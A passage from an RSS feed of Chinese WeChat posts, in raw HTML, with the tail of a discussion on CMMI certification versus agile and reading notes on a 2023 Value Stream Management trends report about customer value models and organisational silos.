      宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li></ul></ul><p style=""><strong><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">东伟：</span></strong><span lang="EN-US" style="font-size:
11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
0pt;"><o:p></o:p></span></p><ul style="list-style: none;" type="disc" class="list-paddingleft-1"><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l3 level1 lfo4;tab-stops:list 36.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
     Calibri;mso-font-kerning:0pt;">实践体会</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
     宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><ul style="margin-top:0cm;" type="circle" class="list-paddingleft-1"><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l3 level2 lfo4;tab-stops:list 72.0pt;vertical-align:middle;"><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">EPG</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">成员之一，一半以上项目是敏捷方式，通过</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
      宋体;mso-font-kerning:0pt;">CMM</span><span lang="EN-US" style="font-size:
      11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:0pt;">i3</span><span style="font-size:11.0pt;font-family:
      &#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:0pt;">级，<span style="color:#FA0000;">敏捷做好了，<span lang="EN-US">CMM</span>很容易</span>。</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l3 level2 lfo4;tab-stops:list 72.0pt;vertical-align:middle;"><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">CMM</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">是告诉你做什么，但没强制你怎么做，所以你也可以用瀑布的方式来实现，从这个角度，<span style="color:#FA0000;">敏捷和</span></span><span lang="EN-US" style="font-size:
      11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#FA0000;mso-font-kerning:0pt;">CMM</span><span style="font-size:
      11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#FA0000;mso-font-kerning:0pt;">不是一个层面的东西</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">。</span><span lang="EN-US" style="font-size:
      11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li></ul><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l3 level1 lfo4;tab-stops:list 36.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
     Calibri;mso-font-kerning:0pt;">数据问题</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
     宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><ul style="margin-top:0cm;" type="circle" class="list-paddingleft-1"><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l3 level2 lfo4;tab-stops:list 72.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">如果企业没有那个能力，又要拿证书，不造假还能怎么样？企业不是为了提升自己，而是为了拿证，那只能<span style="color:#FA0000;">造假，但这和</span></span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
      宋体;color:#FA0000;mso-font-kerning:0pt;">CMM</span><span style="font-size:
      11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#FA0000;mso-font-kerning:0pt;">也没有关系</span><span style="font-size:
      11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:0pt;">。</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:
      0pt;"><o:p></o:p></span></p></li></ul></ul><p style=""><strong><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">店明：</span></strong><span lang="EN-US" style="font-size:
11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
0pt;"><o:p></o:p></span></p><ul style="list-style: none;" type="disc" class="list-paddingleft-1"><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l0 level1 lfo5;tab-stops:list 36.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
     Calibri;mso-font-kerning:0pt;">实践体会</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
     宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><ul style="margin-top:0cm;" type="circle" class="list-paddingleft-1"><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l0 level2 lfo5;tab-stops:list 72.0pt;vertical-align:middle;"><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">2000</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">年，老板是</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
      宋体;mso-font-kerning:0pt;">CMM</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
      0pt;">最顶级的评估师之一。</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:
      0pt;">CMMI</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:0pt;">要做好也很好，引入</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">CMMI</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">的人，要<span style="color:#FA0000;">根据企业情况进行定制化，谁有这个能力呢？</span>需要非常资深的内部、外部人员，把一堆实践放进去，就能够起到很好的作用。</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l0 level2 lfo5;tab-stops:list 72.0pt;vertical-align:middle;"><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">CMM</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">是先有一堆东西，</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
      宋体;mso-font-kerning:0pt;">SCRUM</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
      0pt;">是先有核心价值观、原则，<span style="color:#FA0000;">从这些核心价值观、原则出发</span>，根据公司的实际情况，完善实践。</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li></ul><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l0 level1 lfo5;tab-stops:list 36.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
     Calibri;mso-font-kerning:0pt;">关键问题</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
     宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><ul style="margin-top:0cm;" type="circle" class="list-paddingleft-1"><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l0 level2 lfo5;tab-stops:list 72.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;color:#FA0000;mso-font-kerning:0pt;">关键是要有专业的人，帮助识别企业的问题，用合适的实践解决问题，达到目的</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">。</span><span lang="EN-US" style="font-size:
      11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li></ul></ul><p style=""><strong>感受</strong><br/></p><p style=""><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">Lisa</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
0pt;">在读问题的时候，就显得比较婉转。每位老师在解读的时候，都心平气和，淡定从容，没有指责，没有鄙视。都先谈自己的实践体会，再剖析现实、路径或目标是否有问题，再建议。推荐大家看下视频回放，体验很好，几位升级的老师，文如秋水，品似春山，修为都不一般，<span lang="EN-US">coach</span>能力超群<span lang="EN-US"><o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.237962962962963" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=aec89dbf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzgmNWuyy93y2oJaHqXNgKnNmseWBbF1vYibJcYGvC0zO6lLmAIb3o091XrfgSleLibjiafU50eYzSGA%2F640%3Fwx_fmt%3Dpng"/></p><p style=""><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
0pt;"></span></p><p style=""><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
0pt;"><br/></span></p><p><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;"><br/></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483753">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a1639c00&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247483753%26idx%3D1%26sn%3D25d5a05add63116c95050887e18a2e30%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 13 Jul 2023 23:17:00 +0800</pubDate>
    </item>
    <item>
      <title>2023价值流管理趋势报告 （笔记）</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483722&amp;idx=1&amp;sn=fdf2c69bf65c042c298f19fece9f9a0c</link>
      <description>科技不是唯一的事情。它是和人性有关的东西。我们需要让人们相互联系、合作和创新。</description>
      <content:encoded><![CDATA[<p>
<span>酒神 Dionysus</span> <span>2023-04-12 17:22</span> <span style="display: inline-block;">上海</span>
</p>

<p>科技不是唯一的事情。它是和人性有关的东西。我们需要让人们相互联系、合作和创新。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=a937c256&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FFStUibflSINzuKkicFkasp7ycqvHNsNBmoSCGVMKCGEhfauO4NVt3aarRg0c9QK2hcDsFcuiaahcxTPlDzkbSrhpQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<h1 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;">引<span style="color: rgb(30, 78, 121);font-size: 16pt;">子</span></h1><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">科技不是唯一的事情。它是和人性有关的东西。我们需要让人们相互联系、合作和创新。</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;text-align: right;">            - <span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 16px;">斯蒂夫</span><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 16px;">·乔布斯（Steve Jobs）</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;"><span style="color: rgb(20, 50, 77);font-size: 16pt;">笔记摘抄</span><br/></p><ul class="list-paddingleft-1" style="width: 569.429px;white-space: normal;"><li style="vertical-align: middle;color: black;"><p><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;">客户价值模型是了解客户最关心什么</span></p></li><li style="vertical-align: middle;color: black;"><p><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;">新时代企业还面临竖井问题，经常源于信息流动受限、缺乏单一的真相来源、围绕客户价值不一致的优先事项，并且受到在危机期间实施的改进流程所带来的长期影响的困扰</span></p></li><li><p><span style="color: black;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;">关于组织协调的一个常见误解是，它完全是由高级领导推动的自上而下的倡议。另一个误解是，可以通过表面的措施如口号、海报或演示文稿来实现组织协调</span><span>。</span></p></li><li><p><span>实现组织协调需要创建一种信任、透明度</span><span style="color: black;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;">和开放沟通的文化，创造了一种拥有感、参与感和承诺感</span></p><p style="color: black;"><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"></span></p></li></ul><table cellpadding="0" cellspacing="0" valign="top" title="" summary=""><tbody><tr><td style="border-width: 0pt;vertical-align: top;padding: 2pt 3pt;" width="632"><h1 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#1E4E79;">目录</h1></td></tr><tr><td style="border-width: 0pt;vertical-align: top;padding: 2pt 3pt;word-break: break-all;" width="635.3333333333334"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">- </span><span lang="x-none">新概念Customer Value Model是什么？</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">客户体验模型和客户价值模型的区别</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">和商业模型画布的关系</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">- </span><span lang="x-none">重回竖井时代</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">新竖井的原因</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">- </span><span lang="x-none">组织协调、透明度、敏捷性</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">组织协调，不是组织对齐</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">VSM为什么也会导致竖井？</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">- </span><span lang="x-none">客户价值的实话</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">直接解决问题、关注直接反馈</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">VSM的新手和专业玩家</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><br/></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"> <img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.1635416666666667" data-s="300,640" data-type="jpeg" data-w="960" style="text-align: center;font-size: 12pt;width: 219px;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=fc2f94fc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FFStUibflSINzuKkicFkasp7ycqvHNsNBmoKcHj6vybFkLTfpfJCQZ7O4czgiaWUvFUHteiariaiaYziaVBK4m1olTsRCA%2F640%3Fwx_fmt%3Djpeg"/></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><br/></p><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;"><span style="font-family:
&#34;Microsoft YaHei&#34;;" lang="zh-CN">新概念</span><span style="font-family:Calibri;" lang="en-US">Customer Value Model</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">是什么？</span></h1><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">&#34;The
business trials of the last few years are not over, as many remain concerned
about supply chains,<span style="mso-spacerun:yes;">  </span>gathering business
data, and improving inefficient processes in 2023. Yet in a developing trend,
the top strategic focus for 2023 is on the customer, specifically on increasing
customer value, supplanting the traditional ‘increasing speed to market’
strategy. Executives and survey participants revealed that measuring customer
value is not easy and requires numerous metrics. However, companies with VSM
initiatives up and running possess comprehensive customer value models and are
collecting and tracking more metrics to support that model&#34;</p><p style="margin-right: 0in;margin-left: 0in;font-family: Calibri;font-size: 12pt;color: black;" lang="en-US">===cg-b</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;">客户价值模型是用于量化和衡量公司向客户提供的价值的框架。它帮助公司</span><span style="color:red;">了解客户最关心什么，他们如何看待公司的产品或服务，以及公司如何改进其产品或服务以更好地满足客户的需求</span><span style="color:black;">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">一个综合的客户价值模型应该涵盖与客户满意度、忠诚度、留存率和生命周期价值相关的各种指标。例如，它可以包括净推荐值（NPS）、客户努力得分（CES）、客户生命周期价值（CLV）和客户满意度评级等指标。</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">除了这些指标外，客户价值模型还应考虑客户体验、产品或服务质量、定价和品牌形象等因素。这些信息可以从多个来源收集，包括客户反馈、市场调研和内部业绩指标。</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">一旦公司制定了客户价值模型，就可以利用这个框架进行数据驱动的决策，以改善客户价值。例如，它可以确定需要投资产品开发或客户服务的领域，或者可以调整其定价策略以更好地满足客户的需求和期望。通过专注于提高客户价值，公司可以建立与客户更强的关系，这可以带来长期的忠诚度、留存率和收入增长。</p><p style="margin-right: 0in;margin-left: 0in;font-family: Calibri;font-size: 12pt;color: black;" lang="en-US">---</p><p style="margin-right: 0in;margin-left: 0in;font-family: Calibri;font-size: 12pt;color: black;" lang="en-US"><br/></p><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">客户体验模型和客户价值模型的区别</h2><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">客户体验模型和客户价值模型是营销和商业战略中使用的两种相关但不同的框架。</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:red;">客户体验模型</span><span style="color:black;">是用于理解和改善客户与公司产品或服务的整体体验的框架。它涉及到</span><span style="color:red;">绘制客户旅程、识别触点，并在旅程的每个阶段评估客户满意度</span><span style="color:black;">。客户体验模型的目标是为客户创造积极和无缝的体验，使他们感到受到公司的重视和欣赏。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;">相比之下，</span><span style="color:red;">客户价值模型</span><span style="color:black;">是一种用于量化和衡量公司向客户提供的价值的框架。它帮助公司</span><span style="color:
red;">了解客户最关心什么，他们如何看待公司的产品或服务，以及公司如何改进其产品或服务以更好地满足客户的需求</span><span style="color:black;">。客户价值模型注重识别和衡量客户认为有价值的特定元素，然后优化这些元素以最大程度地提高客户的满意度、忠诚度、留存率和生命周期价值。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;">总的来说，虽然这两种模型都涉及改善客户体验，</span><span style="color:red;">但客户体验模型更侧重于客户的主观感受和情感，而客户价值模型更侧重于推动客户满意度和忠诚度的客观因素</span><span style="color:black;">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;"><br/></span></p><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">和商业模型画布的关系</h2><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: rgb(100, 43, 145);">【思】在商业模型画布中，客户体验模型更接近渠道模块，即业务如何与客户交互，并交付价值；客户价值模型更接近价值主张模块，及业务提供给客户的独特价值。</p><p style="margin-right: 0in;margin-left: 0in;font-family: Calibri;font-size: 12pt;color: black;" lang="en-US">===cg-e</p><p style="margin-right: 0in;margin-left: 0in;font-family: Calibri;font-size: 12pt;color: black;" lang="en-US"><br/></p><p style="margin-right: 0in;margin-left: 0in;font-family: Calibri;font-size: 12pt;color: black;" lang="en-US"><br/></p><p style="margin-right: 0in;margin-left: 0in;font-family: Calibri;font-size: 12pt;color: black;" lang="en-US"><br/></p><h1 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;">远程工作、云资源和重新设计的供应链反而有可能让企业重回竖井时代</h1><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">Remote
workers, cloud resources, and re-engineered supply chains have resulted in new
or altered<span style="mso-spacerun:yes;">  </span>business processes.
Unfortunately, these are returning organizations to the siloed operations many
worked so hard to remove. Nearly 7 out of 10 companies reported disconnects
between the business and software development. More than 7 out of 10 technology
roles surveyed indicated they are frustrated by the business and constant
changes to strategy.</p><p style="margin-right: 0in;margin-left: 0in;font-family: Calibri;font-size: 12pt;color: black;" lang="en-US">===cgb</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;">一份报告指出：“远程工作、云资源和重新设计的供应链已导致企业新的或改变了的业务流程。不幸的是，这些正在</span><span style="color:#FA0000;">使许多企业重新回到过去所努力消除的分立操作</span><span style="color:black;">。近7成公司报告业务与软件开发之间存在脱节。超过7成的技术角色调查显示，他们对业务和不断变化的战略感到沮丧。”</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">为什么新技术和业务流程重组仍然导致分立操作呢？新技术、远程工作环境和业务流程重组的采纳可以给企业带来显著的好处，如提高效率和生产力。然而，这些变化也可能会带来新的挑战和意外后果。</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;">导致这些变化导致分立作业的可能原因之一是它们可能是在没有综合考虑所有利益相关者的需求和观点的情况下实施的。例如，虽然</span><span style="color:#FA0000;">新技术解决方案可能会提高一个部门的效率，但可能无法与另一个部门的现有系统很好地集成，从而导致分立和脱节</span><span style="color:black;">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">此外，远程工作环境可能会在团队和部门之间创造物理距离，使得难以协作和共享信息。这可能导致每个团队独立工作，而不考虑其他团队的需求或目标。</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;">最后，频繁变化的战略和方向也可能会导致分立操作。</span><span style="color:#FA0000;">当每个部门或团队仅关注自己的目标时，很难将所有人定位到共同的目标上，从而导致分立和脱节</span><span style="color:black;">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;">总之，企业在采用新技术或改变业务流程时，重要的是要采取</span><span style="color:#FA0000;">综合方法</span><span style="color:black;">，并考虑所有利益相关者的需求和观点，以避免分立操作。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: Calibri;font-size: 12pt;color: black;" lang="en-US">===cge</p><p style="margin-right: 0in;margin-left: 0in;font-family: Calibri;font-size: 12pt;color: black;" lang="en-US"><br/></p><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">新竖井的原因</h2><p style="margin-right: 0in;margin-left: 0in;font-size: 12pt;"><span style="font-family:&#34;微软雅黑 Light&#34;;color:black;">企业中存在普遍的脱节和分立运作。参与者提供了</span><span style="font-family:Calibri;color:black;">2023</span><span style="font-family:&#34;微软雅黑 Light&#34;;color:black;">年的主要挑战和重点，例如供应链问题、低效的流程、远程工作和更加关注客户价值，因此</span><span style="font-family:Calibri;color:black;">68%</span><span style="font-family:
&#34;微软雅黑 Light&#34;;color:black;">的人表示业务战略和发展之间存在脱节并不令人意外。</span><span style="font-family:Calibri;color:black;">72%</span><span style="font-family:
&#34;微软雅黑 Light&#34;;color:black;">的技术领导角色表示，他们受到来自业务领导者不断变化的优先考虑的困扰。与高管的访谈提供了这些持续问题的关键见解，并指出它们</span><span style="font-family:&#34;微软雅黑 Light&#34;;color:#FA0000;">经常源于信息流动受限、缺乏单一的真相来源、围绕客户价值不一致的优先事项，并且受到在危机期间实施的改进流程所带来的长期影响的困扰</span><span style="font-family:&#34;微软雅黑 Light&#34;;color:black;">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: rgb(100, 43, 145);">【思】新竖井的原因</p><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">信息流动受限</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">缺乏唯一的真相来源</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">围绕客户价值不一致的优先事项</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">危机流程变成常态流程</span></p></li></ul><p><br/></p><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><br/></span></p><h1 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;">组织协调、透明度、敏捷性</h1><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
Calibri;">organizational alignment</span><span style="font-family:&#34;微软雅黑 Light&#34;;">被翻译为组织协调，而不是组织对齐</span></h2><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">Value
Stream Management (VSM) is a technology that helps improve organizational
alignment, transparency, and delivery speed, which are all important concerns
for businesses in 2023. VSM focuses on delivering customer value, making it an
ideal technology for companies to adopt. Over 80% of companies are currently
using or planning to use VSM. The adoption of VSM has shifted from early
adopters to the mainstream, with 60% of businesses planning to use it in 2023.
VSM is also closely associated with digital transformations, with 95% of
businesses implementing VSM initiatives also pursuing DT. Companies using VSM
report improved ability to measure and track customer value using sophisticated
